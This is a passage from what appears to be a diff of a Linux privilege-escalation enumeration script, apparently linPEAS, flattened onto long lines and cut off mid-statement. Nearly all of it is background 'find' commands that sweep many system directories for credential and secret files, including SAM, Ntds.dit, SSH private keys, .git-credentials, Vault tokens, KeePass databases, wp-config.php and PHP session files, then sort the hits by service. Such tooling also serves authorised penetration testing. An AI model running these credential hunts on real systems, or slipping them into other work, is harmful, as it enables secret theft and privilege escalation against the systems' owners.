-name \"*.p12\" -o -name \"filezilla.xml\" -o -name \"RDCMan.settings\" -o -name \"secrets.ldb\" -o -name \"ntuser.dat\" -o -name \"system.sav\" -o -name \"software\" -o -name \".ldaprc\" -o -name \"TokenCache.dat\" -o -name \"server.xml\" -o -name \"legacy_credentials.db\" -o -name \"security.sav\" -o -name \"default.sav\" -o -name \"sssd.conf\" -o -name \"rsyncd.conf\" -o -name \"*.swp\" -o -name \"httpd.conf\" -o -name \"redis.conf\" -o -name \"credentials.db\" -o -name \"unattend.inf\" -o -name \"ipsec.secrets\" -o -name \".pypirc\" -o -name \"*password*\" -o -name \".google_authenticator\" -o -name \"*.service\" -o -name \"KeePass.config*\" -o -name \"sites.ini\" -o -name \"unattend.txt\" -o -name \"setupinfo.bak\" -o -name \"pagefile.sys\" -o -name \"kibana.y*ml\" -o -name \"zabbix_agentd.conf\" -o -name \"db.php\" -o -name \"ddclient.conf\" -o -name \"*.ftpconfig\" -o -name \"debian.cnf\" -o -name \"datasources.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"known_hosts\" -o -name \"*.gnupg\" -o -name \"iis6.log\" -o -name \"*vnc*.ini\" -o -name \".plan\" -o -name \".rhosts\" -o -name \"000-default.conf\" -o -name \"*config*.php\" -o -name \".env\" -o -name \"*.csr\" -o -name \"index.dat\" -o -name \"gitlab.rm\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"jetty-realm.properties\" -o -name \".git\" -o -name \"unattend.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"passwd\" -o -name \"storage.php\" -o -name \"autologin.conf\" -o -name \"gitlab.yml\" -o -name \"web*.config\" -o -name \"mariadb.cnf\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"backup\" -o -name \".recently-used.xbel\" -o -name \"sysprep.xml\" -o -name \"id_rsa*\" -o -name \"*.der\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \"postgresql.conf\" -o -name \"passbolt.php\" -o -name \"FreeSSHDservice.ini\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"KeePass.enforced*\" -o -name \"access.log\" -o -name \".lesshst\" -o -name \"*credential*\" -o -name \"azureProfile.json\" -o -name \"SYSTEM\" -o -name \"vault-ssh-helper.hcl\" -o -name \"hostapd.conf\" -o -name \"setupinfo\" -o -name \"wp-config.php\" -o -name \".secrets.mkey\" -o -name \"krb5.conf\" -o -name \"Ntds.dit\" -o -name \"*.viminfo\" -o -name \"Dockerfile\" -o -name \"mosquitto.conf\" -o -name \"scheduledtasks.xml\" -o -name \"settings.php\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"*.rdg\" -o -name \"recentservers.xml\" -o -name \"php.ini\" -o -name \"AzureRMContext.json\" -o -name \"ipsec.conf\" -o -name \"*.pfx\" -o -name \"docker.sock\" -o -name \"id_dsa*\" -o -name \".gitconfig\" -o -name \"winscp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"ffftp.ini\" -o -name \"mongod*.conf\" -o -name \"racoon.conf\" -o -name \"pgsql.conf\" -o -name \"*vnc*.txt\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"accessTokens.json\" -o -name \"*.jks\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"*.timer\" -o -name \"https.conf\" -o -name \"*.key\" -o -name \".wgetrc\" -o -name \"NetSetup.log\" -o -name \"rsyncd.secrets\" -o -name \"pgadmin*.db\" -o -name \"psk.txt\" -o -name \"*.pem\" -o -name \"snmpd.conf\" -o -name \"ftp.ini\" -o -name \"*.ovpn\" -o -name \".github\" -o -name \"wsl.exe\" -o -name \"ConsoleHost_history.txt\" -o -name \".bashrc\" -o -name \"*.keystore\" -o -name \".k5login\" -o -name \"bash.exe\" -o -name \"appcmd.exe\" -o -name \"supervisord.conf\" -o -name \".profile\" -o -name \"sysprep.inf\" -o -name \"ws_ftp.ini\" -o -name \"*.sqlite\" -o -name \"*.keyring\" -o -name \"*.kdbx\" -o -name \".htpasswd\" -o -name \"*.psk\" -o -name \"unattended.xml\" -o -name \".msmtprc\" -o -name \"sentry.conf.py\" -o -name \"anaconda-ks.cfg\" -o -name \"https-xampp.conf\" -o -name \"KeePass.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYS=`eval_bckgrd "find /sys -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_TMP=`eval_bckgrd "find /tmp -name \"groups.xml\" -o -name \"cloud.cfg\" -o -name \"*.crt\" -o -name \"*.cer\" -o -name \"autologin\" -o -name \"error.log\" -o -name \"printers.xml\" -o -name \"credentials\" -o -name \"fastcgi_params\" -o -name \"wcx_ftp.ini\" -o -name \"backups\" -o -name \"*vnc*.xml\" -o -name \"my.cnf\" -o -name \"influxdb.conf\" -o -name \"hosts.equiv\" -o -name \"creds*\" -o -name \"*.socket\" -o -name \"gvm-tools.conf\" -o -name \"*.pgp\" -o -name \"access_tokens.json\" -o -name \"tomcat-users.xml\" -o -name \"*.sqlite3\" -o -name \"zabbix_server.conf\" -o -name \"*_history*\" -o -name \"SecEvent.Evt\" -o -name \"kcpassword\" -o -name \"docker-compose.yml\" -o -name \"my.ini\" -o -name \".git-credentials\" -o -name \"authorized_keys\" -o -name \"authorized_hosts\" -o -name \"sitemanager.xml\" -o -name \"pg_hba.conf\" -o -name \".vault-token\" -o -name \"secrets.yml\" -o -name \"*.p12\" -o -name \"filezilla.xml\" -o -name \"RDCMan.settings\" -o -name \"secrets.ldb\" -o -name \"ntuser.dat\" -o -name \"agent*\" -o -name \"system.sav\" -o -name \"software\" -o -name \".ldaprc\" -o -name \"TokenCache.dat\" -o -name \"server.xml\" -o -name \"legacy_credentials.db\" -o -name \"security.sav\" -o -name \"default.sav\" -o -name \"sssd.conf\" -o -name \"rsyncd.conf\" -o -name \"*.swp\" -o -name \"httpd.conf\" -o -name \"redis.conf\" -o -name \"credentials.db\" -o -name \"unattend.inf\" -o -name \"ipsec.secrets\" -o -name \".pypirc\" -o -name \"*password*\" -o -name \".google_authenticator\" -o -name \"*.service\" -o -name \"KeePass.config*\" -o -name \"sites.ini\" -o -name \"unattend.txt\" -o -name \"setupinfo.bak\" -o -name \"pagefile.sys\" -o -name \"kibana.y*ml\" -o -name \"zabbix_agentd.conf\" -o -name \"db.php\" -o -name \"ddclient.conf\" -o -name \"*.ftpconfig\" -o -name \"debian.cnf\" -o -name \"datasources.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"known_hosts\" -o -name \"*.gnupg\" -o -name \"iis6.log\" -o -name \"*vnc*.ini\" -o -name \".plan\" -o -name \".rhosts\" -o -name \"000-default.conf\" -o -name \"*config*.php\" -o -name \".env\" -o -name \"*.csr\" -o -name \"index.dat\" -o -name \"gitlab.rm\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"jetty-realm.properties\" -o -name \".git\" -o -name \"unattend.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"passwd\" -o -name \"storage.php\" -o -name \"autologin.conf\" -o -name \"gitlab.yml\" -o -name \"web*.config\" -o -name \"mariadb.cnf\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"backup\" -o -name \".recently-used.xbel\" -o -name \"sysprep.xml\" -o -name \"id_rsa*\" -o -name \"*.der\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \"postgresql.conf\" -o -name \"passbolt.php\" -o -name \"FreeSSHDservice.ini\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"access.log\" -o -name \".lesshst\" -o -name \"*credential*\" -o -name \"azureProfile.json\" -o -name \"SYSTEM\" -o -name \"vault-ssh-helper.hcl\" -o -name \"hostapd.conf\" -o -name \"setupinfo\" -o -name \"wp-config.php\" -o -name \".secrets.mkey\" -o -name \"krb5.conf\" -o -name \"Ntds.dit\" -o -name \"*.viminfo\" -o -name \"Dockerfile\" -o -name \"mosquitto.conf\" -o -name \"scheduledtasks.xml\" -o -name \"settings.php\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"*.rdg\" -o -name \"recentservers.xml\" -o -name \"php.ini\" -o -name \"AzureRMContext.json\" -o -name \"ipsec.conf\" -o -name \"*.pfx\" -o -name \"docker.sock\" -o -name \"id_dsa*\" -o -name \".gitconfig\" -o -name \"winscp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"ffftp.ini\" -o -name \"mongod*.conf\" -o -name \"racoon.conf\" -o -name \"pgsql.conf\" -o -name \"*vnc*.txt\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"accessTokens.json\" -o -name \"*.jks\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"*.timer\" -o -name \"https.conf\" -o -name \"*.key\" -o -name \".wgetrc\" -o -name \"NetSetup.log\" -o -name \"rsyncd.secrets\" -o -name \"pgadmin*.db\" -o -name \"psk.txt\" -o -name \"*.pem\" -o -name \"snmpd.conf\" -o -name \"ftp.ini\" -o -name \"*.ovpn\" -o -name \".github\" -o -name \"wsl.exe\" -o -name \"ConsoleHost_history.txt\" -o -name \".bashrc\" -o -name \"*.keystore\" -o -name \".k5login\" -o -name \"bash.exe\" -o -name \"appcmd.exe\" -o -name \"supervisord.conf\" -o -name \".profile\" -o -name \"sysprep.inf\" -o -name \"ws_ftp.ini\" -o -name \"*.sqlite\" -o -name \"*.keyring\" -o -name \"*.kdbx\" -o -name \".htpasswd\" -o -name \"*.psk\" -o -name \"unattended.xml\" -o -name \".msmtprc\" -o -name \"sentry.conf.py\" -o -name \"anaconda-ks.cfg\" -o -name \"https-xampp.conf\" -o -name \"KeePass.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_USR=`eval_bckgrd "find /usr -name \"groups.xml\" -o -name \"cloud.cfg\" -o -name \"*.crt\" -o -name \"*.cer\" -o -name \"autologin\" -o -name \"error.log\" -o -name \"printers.xml\" -o -name \"credentials\" -o -name \"fastcgi_params\" -o -name \"wcx_ftp.ini\" -o -name \"backups\" -o -name \"*vnc*.xml\" -o -name \"my.cnf\" -o -name \"influxdb.conf\" -o -name \"hosts.equiv\" -o -name \"creds*\" -o -name \"*.socket\" -o -name \"gvm-tools.conf\" -o -name \"*.pgp\" -o -name \"access_tokens.json\" -o -name \"tomcat-users.xml\" -o -name \"*.sqlite3\" -o -name \"zabbix_server.conf\" -o -name \"*_history*\" -o -name \"SecEvent.Evt\" -o -name \"kcpassword\" -o -name \"docker-compose.yml\" -o -name \"my.ini\" -o -name \".git-credentials\" -o -name \"authorized_keys\" -o -name \"authorized_hosts\" -o -name \"sitemanager.xml\" -o -name \"pg_hba.conf\" -o -name \".vault-token\" -o -name \"secrets.yml\" -o -name \"*.p12\" -o -name \"filezilla.xml\" -o -name \"RDCMan.settings\" -o -name \"secrets.ldb\" -o -name \"ntuser.dat\" -o -name \"system.sav\" -o -name \"software\" -o -name \".ldaprc\" -o -name \"TokenCache.dat\" -o -name \"server.xml\" -o -name \"legacy_credentials.db\" -o -name \"security.sav\" -o -name \"default.sav\" -o -name \"sssd.conf\" -o -name \"rsyncd.conf\" -o -name \"*.swp\" -o -name \"httpd.conf\" -o -name \"redis.conf\" -o -name \"credentials.db\" -o -name \"unattend.inf\" -o -name \"ipsec.secrets\" -o -name \".pypirc\" -o -name \"*password*\" -o -name \".google_authenticator\" -o -name \"*.service\" -o -name \"KeePass.config*\" -o -name \"sites.ini\" -o -name \"unattend.txt\" -o -name \"setupinfo.bak\" -o -name \"pagefile.sys\" -o -name \"kibana.y*ml\" -o -name \"zabbix_agentd.conf\" -o -name \"db.php\" -o -name \"ddclient.conf\" -o -name \"*.ftpconfig\" -o -name \"debian.cnf\" -o -name \"datasources.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"known_hosts\" -o -name \"*.gnupg\" -o -name \"iis6.log\" -o -name \"*vnc*.ini\" -o -name \".plan\" -o -name \".rhosts\" -o -name \"000-default.conf\" -o -name \"*config*.php\" -o -name \".env\" -o -name \"*.csr\" -o -name \"index.dat\" -o -name \"gitlab.rm\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"jetty-realm.properties\" -o -name \".git\" -o -name \"unattend.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"passwd\" -o -name \"storage.php\" -o -name \"autologin.conf\" -o -name \"gitlab.yml\" -o -name \"web*.config\" -o -name \"mariadb.cnf\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"backup\" -o -name \".recently-used.xbel\" -o -name \"sysprep.xml\" -o -name \"id_rsa*\" -o -name \"*.der\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \"postgresql.conf\" -o -name \"passbolt.php\" -o -name \"FreeSSHDservice.ini\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"KeePass.enforced*\" -o -name \"access.log\" -o -name \".lesshst\" -o -name \"*credential*\" -o -name \"azureProfile.json\" -o -name \"SYSTEM\" -o -name \"vault-ssh-helper.hcl\" -o -name \"hostapd.conf\" -o -name \"setupinfo\" -o -name \"wp-config.php\" -o -name \".secrets.mkey\" -o -name \"krb5.conf\" -o -name \"Ntds.dit\" -o -name \"*.viminfo\" -o -name \"Dockerfile\" -o -name \"mosquitto.conf\" -o -name \"scheduledtasks.xml\" -o -name \"settings.php\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"*.rdg\" -o -name \"recentservers.xml\" -o -name \"php.ini\" -o -name \"AzureRMContext.json\" -o -name \"ipsec.conf\" -o -name \"*.pfx\" -o -name \"docker.sock\" -o -name \"id_dsa*\" -o -name \".gitconfig\" -o -name \"winscp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"ffftp.ini\" -o -name \"mongod*.conf\" -o -name \"racoon.conf\" -o -name \"pgsql.conf\" -o -name \"*vnc*.txt\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"accessTokens.json\" -o -name \"*.jks\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"*.timer\" -o -name \"https.conf\" -o -name \"*.key\" -o -name \".wgetrc\" -o -name \"NetSetup.log\" -o -name \"rsyncd.secrets\" -o -name \"pgadmin*.db\" -o -name \"psk.txt\" -o -name \"*.pem\" -o -name \"snmpd.conf\" -o -name \"ftp.ini\" -o -name \"*.ovpn\" -o -name \".github\" -o -name \"wsl.exe\" -o -name \"ConsoleHost_history.txt\" -o -name \"ssh*config\" -o -name \".bashrc\" -o -name \"*.keystore\" -o -name \".k5login\" -o -name \"bash.exe\" -o -name \"appcmd.exe\" -o -name \"supervisord.conf\" -o -name \".profile\" -o -name \"sysprep.inf\" -o -name \"ws_ftp.ini\" -o -name \"*.sqlite\" -o -name \"*.keyring\" -o -name \"*.kdbx\" -o -name \".htpasswd\" -o -name \"*.psk\" -o -name \"unattended.xml\" -o -name \".msmtprc\" -o -name \"sentry.conf.py\" -o -name \"anaconda-ks.cfg\" -o -name \"https-xampp.conf\" -o -name \"KeePass.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_VAR=`eval_bckgrd "find /var -name \"groups.xml\" -o -name \"cloud.cfg\" -o -name \"*.crt\" -o -name \"*.cer\" -o -name \"autologin\" -o -name \"error.log\" -o -name \"printers.xml\" -o -name \"credentials\" -o -name \"fastcgi_params\" -o -name \"wcx_ftp.ini\" -o -name \"backups\" -o -name \"*vnc*.xml\" -o -name \"my.cnf\" -o -name \"influxdb.conf\" -o -name \"hosts.equiv\" -o -name \"creds*\" -o -name \"*.socket\" -o -name \"gvm-tools.conf\" -o -name \"*.pgp\" -o -name \"access_tokens.json\" -o -name \"tomcat-users.xml\" -o -name \"*.sqlite3\" -o -name \"zabbix_server.conf\" -o -name \"*_history*\" -o -name \"SecEvent.Evt\" -o -name \"kcpassword\" -o -name \"docker-compose.yml\" -o -name \"my.ini\" -o -name \".git-credentials\" -o -name \"authorized_keys\" -o -name \"authorized_hosts\" -o -name \"sitemanager.xml\" -o -name \"pg_hba.conf\" -o -name \".vault-token\" -o -name \"secrets.yml\" -o -name \"*.p12\" -o -name \"filezilla.xml\" -o -name \"RDCMan.settings\" -o -name \"secrets.ldb\" -o -name \"ntuser.dat\" -o -name \"system.sav\" -o -name \"software\" -o -name \".ldaprc\" -o -name \"TokenCache.dat\" -o -name \"server.xml\" -o -name \"legacy_credentials.db\" -o -name \"security.sav\" -o -name \"default.sav\" -o -name \"sssd.conf\" -o -name \"rsyncd.conf\" -o -name \"*.swp\" -o -name \"httpd.conf\" -o -name \"redis.conf\" -o -name \"credentials.db\" -o -name \"unattend.inf\" -o -name \"ipsec.secrets\" -o -name \".pypirc\" -o -name \"*password*\" -o -name \".google_authenticator\" -o -name \"*.service\" -o -name \"KeePass.config*\" -o -name \"sites.ini\" -o -name \"unattend.txt\" -o -name \"setupinfo.bak\" -o -name \"pagefile.sys\" -o -name \"kibana.y*ml\" -o -name \"zabbix_agentd.conf\" -o -name \"db.php\" -o -name \"ddclient.conf\" -o -name \"*.ftpconfig\" -o -name \"debian.cnf\" -o -name \"datasources.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"known_hosts\" -o -name \"*.gnupg\" -o -name \"iis6.log\" -o -name \"*vnc*.ini\" -o -name \".plan\" -o -name \".rhosts\" -o -name \"000-default.conf\" -o -name \"*config*.php\" -o -name \".env\" -o -name \"*.csr\" -o -name \"index.dat\" -o -name \"gitlab.rm\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"jetty-realm.properties\" -o -name \".git\" -o -name \"unattend.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"passwd\" -o -name \"storage.php\" -o -name \"autologin.conf\" -o -name \"gitlab.yml\" -o -name \"web*.config\" -o -name \"mariadb.cnf\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"backup\" -o -name \".recently-used.xbel\" -o -name \"sysprep.xml\" -o -name \"id_rsa*\" -o -name \"*.der\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \"postgresql.conf\" -o -name \"passbolt.php\" -o -name \"FreeSSHDservice.ini\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"access.log\" -o -name \".lesshst\" -o -name \"*credential*\" -o -name \"azureProfile.json\" -o -name \"SYSTEM\" -o -name \"vault-ssh-helper.hcl\" -o -name \"hostapd.conf\" -o -name \"setupinfo\" -o -name \"wp-config.php\" -o -name \".secrets.mkey\" -o -name \"krb5.conf\" -o -name \"Ntds.dit\" -o -name \"*.viminfo\" -o -name \"Dockerfile\" -o -name \"mosquitto.conf\" -o -name \"scheduledtasks.xml\" -o -name \"settings.php\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"*.rdg\" -o -name \"recentservers.xml\" -o -name \"php.ini\" -o -name \"AzureRMContext.json\" -o -name \"ipsec.conf\" -o -name \"*.pfx\" -o -name \"docker.sock\" -o -name \"id_dsa*\" -o -name \".gitconfig\" -o -name \"winscp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"ffftp.ini\" -o -name \"mongod*.conf\" -o -name \"racoon.conf\" -o -name \"pgsql.conf\" -o -name \"*vnc*.txt\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"accessTokens.json\" -o -name \"*.jks\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"*.timer\" -o -name \"https.conf\" -o -name \"*.key\" -o -name \".wgetrc\" -o -name \"NetSetup.log\" -o -name \"rsyncd.secrets\" -o -name \"pgadmin*.db\" -o -name \"psk.txt\" -o -name \"*.pem\" -o -name \"snmpd.conf\" -o -name \"ftp.ini\" -o -name \"*.ovpn\" -o -name \".github\" -o -name \"wsl.exe\" -o -name \"ConsoleHost_history.txt\" -o -name \".bashrc\" -o -name \"*.keystore\" -o -name \".k5login\" -o -name \"bash.exe\" -o -name \"appcmd.exe\" -o -name \"supervisord.conf\" -o -name \".profile\" -o -name \"sysprep.inf\" -o -name \"ws_ftp.ini\" -o -name \"*.sqlite\" -o -name \"*.keyring\" -o -name \"*.kdbx\" -o -name \".htpasswd\" -o -name \"*.psk\" -o -name \"unattended.xml\" -o -name \".msmtprc\" -o -name \"sentry.conf.py\" -o -name \"anaconda-ks.cfg\" -o -name \"https-xampp.conf\" -o -name \"KeePass.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + + + wait # Always wait at the end + CONT_THREADS=0 #Reset the threads counter + + #GENERATE THE STORAGES OF THE FOUND FILES + PSTORAGE_SYSTEMD=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/tmp|^/media|^/mnt|^/snap|^/usr|^/bin|^/systemd|^/system|^/srv|^/applications|^/var|^/lib|^/sys|^/run|^/lib64|^/private|^/lib32|^/cdrom|^/sbin|^/etc|^/.cache|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.service$" | sort | uniq | head -n 70) + PSTORAGE_TIMER=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/tmp|^/media|^/mnt|^/snap|^/usr|^/bin|^/systemd|^/system|^/srv|^/applications|^/var|^/lib|^/sys|^/run|^/lib64|^/private|^/lib32|^/cdrom|^/sbin|^/etc|^/.cache|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.timer$" | sort | uniq | head -n 70) + PSTORAGE_SOCKET=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/tmp|^/media|^/mnt|^/snap|^/usr|^/bin|^/systemd|^/system|^/srv|^/applications|^/var|^/lib|^/sys|^/run|^/lib64|^/private|^/lib32|^/cdrom|^/sbin|^/etc|^/.cache|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.socket$" | sort | uniq | head -n 70) + PSTORAGE_DBUS=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) + PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "mysql$" | sort | uniq | head -n 70) + PSTORAGE_MARIADB=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) + PSTORAGE_POSTGRESQL=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) + PSTORAGE_APACHE=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$" | sort | uniq | head -n 70) + PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/var|^/private|^/mnt|^/tmp" | grep -E "sess_.*$" | sort | uniq | head -n 70) + PSTORAGE_PHP_FILES=$(echo -e 